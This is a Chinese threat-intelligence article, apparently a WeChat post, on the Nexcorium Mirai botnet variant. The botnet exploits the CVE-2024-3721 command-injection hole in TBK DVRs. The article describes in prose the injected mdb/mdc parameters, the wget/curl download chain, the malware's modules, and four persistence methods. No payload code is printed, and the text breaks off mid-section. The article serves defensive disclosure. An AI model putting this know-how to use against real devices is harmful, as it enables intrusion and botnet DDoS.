      <content:encoded><![CDATA[<p>原创 <span>威胁情报中心</span> <span>2026-04-22 10:01</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=f338b957&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqicDJeN634Pf2K8D1ntewWBn32wPohCava6dgTakHhC1vefW7ZUkvnK3pwlB3yUvUZIWYPGE5xRa3UemE9E8sT4fN85ezE05Mk4%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>奇安信威胁情报中心监测发现，Fortinet FortiGuard Labs与Palo Alto Networks Unit 42联合披露了一起活跃的物联网僵尸网络攻击活动。攻击者利用TBK数字视频录像机（DVR）设备中的命令注入漏洞，部署名为Nexcorium的新型Mirai僵尸网络变种。</p>
  <h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">事件概述</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心监测发现，Fortinet FortiGuard Labs与Palo Alto Networks Unit 42联合披露了一起活跃的物联网僵尸网络攻击活动。攻击者利用TBK数字视频录像机（DVR）设备中的命令注入漏洞，部署名为</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Nexcorium</span></strong><span leaf="">的新型Mirai僵尸网络变种。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该恶意软件具备多架构适配能力，可感染ARM、MIPS R3000及x86-64架构的Linux设备。攻击者通过构建四层持久化机制、集成CVE-2017-17215漏洞利用模块及超长暴力破解字典，形成了一套完整的漏洞利用与横向扩展攻击链条。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">威胁等级：高（High）</span></strong></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">技术分析与威胁归因</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">初始访问向量：CVE-2024-3721命令注入漏洞</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">本次攻击的核心入口为</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">CVE-2024-3721</span></strong><span leaf="">（CVSS 3.1评分6.3），这是一个影响TBK DVR-4104和DVR-4216设备的操作系统命令注入漏洞。攻击者通过操纵HTTP请求中的</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">mdb/mdc参数</span></strong><span leaf="">，向设备注入恶意下载器脚本。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">漏洞利用流程如下：攻击者构造包含恶意载荷的HTTP请求，诱导设备通过wget或curl命令下载名为&#34;dvr&#34;的下载器脚本。该脚本随后从远程服务器获取前缀为&#34;nexuscorp&#34;的恶意二进制样本，根据目标设备的处理器架构自动适配对应版本。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">FortiGuard Labs安全研究员Vincent Li指出，攻击者采用参数传递的方式绕过设备输入验证，直接在设备操作系统层面执行任意命令。这种攻击手法对固件更新滞后、缺乏安全运维的物联网设备尤为有效。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">多架构恶意软件架构</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Nexcorium并非单一二进制文件，而是一套针对不同处理器架构定制的恶意软件家族。安全分析显示，该变种支持以下目标架构：</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">目标架构</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">适用场景</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">ARM</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">主流网络摄像机、路由器</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">MIPS R3000</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">老旧嵌入式设备、DVR</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">x86-64</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">工业控制系统、小型服务器</span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">恶意软件采用经典Mirai架构设计，包含三大核心模块：</span></p><ul style="overflow-wrap: break-word;list-style: circle;padding-left: 1em;margin-left: 0px;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: block;margin: 0.2em 8px;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf=""><span textstyle="" style="font-weight: normal;">1. </span>看门狗模块（Watchdog）<span textstyle="" style="font-weight: normal;">：监控恶意进程状态，检测模拟器或沙箱环境，必要时终止进程以躲避分析</span></span></strong></li><li style="overflow-wrap: break-word;display: block;margin: 0.2em 8px;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf=""><span textstyle="" style="font-weight: normal;">2. </span>扫描器模块（Scanner）<span textstyle="" style="font-weight: normal;">：探测同网段其他物联网设备，尝试Telnet暴力破解</span></span></strong></li><li style="overflow-wrap: break-word;display: block;margin: 0.2em 8px;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf=""><span textstyle="" style="font-weight: normal;">3. </span>攻击者模块（Attacker）<span textstyle="" style="font-weight: normal;">：接收C2指令，执行各类DDoS攻击</span></span></strong></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">配置数据通过XOR编码保护，解码后包含C2域名、攻击命令集和持久化脚本片段。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">威胁行为体溯源：Nexus Team</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击者在多个位置留下身份标识：</span></p><ul style="list-style-type: circle;" class="list-paddingleft-1"><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">受感染设备显示消息：&#34;NexusCorp has taken control&#34;</span></span></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">HTTP请求头：&#34;X-Hacked-By: Nexus Team – Exploited By Erratic&#34;</span></span></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">恶意样本命名约定：&#34;nexuscorp_*&#34;</span></span></p></li></ul></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">据此归因分析，该活动由名为</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Nexus Team</span></strong><span leaf="">的威胁行为体发起，核心成员代号&#34;Erratic&#34;。当前公开信息尚不足以确认该组织与已知APT实体的关联。Nexus Team的具体背景、活动模式和长期目标仍需进一步监测验证。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">战术技术演变分析</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">持久化机制的四层防御体系</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Nexcorium展现出远超传统Mirai变种的持久性设计。该恶意软件部署四层独立的持久化机制，确保设备重启或常规清理操作无法彻底移除威胁：</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第一层：Init配置持久化</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">修改/etc/inittab文件，添加恶意进程启动条目，确保系统初始化阶段即运行恶意代码。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第二层：启动脚本注入</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">篡改/etc/rc.local等启动脚本，将恶意二进制路径写入系统启动流程。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第三层：Systemd服务创建</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">在/etc/systemd/system/目录下创建伪装成合法服务（如&#34;network-service&#34;）的单元文件，注册为开机自启服务。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第四层：Crontab计划任务</span></strong></p><p style="overflow-wrap: break-word;margin: 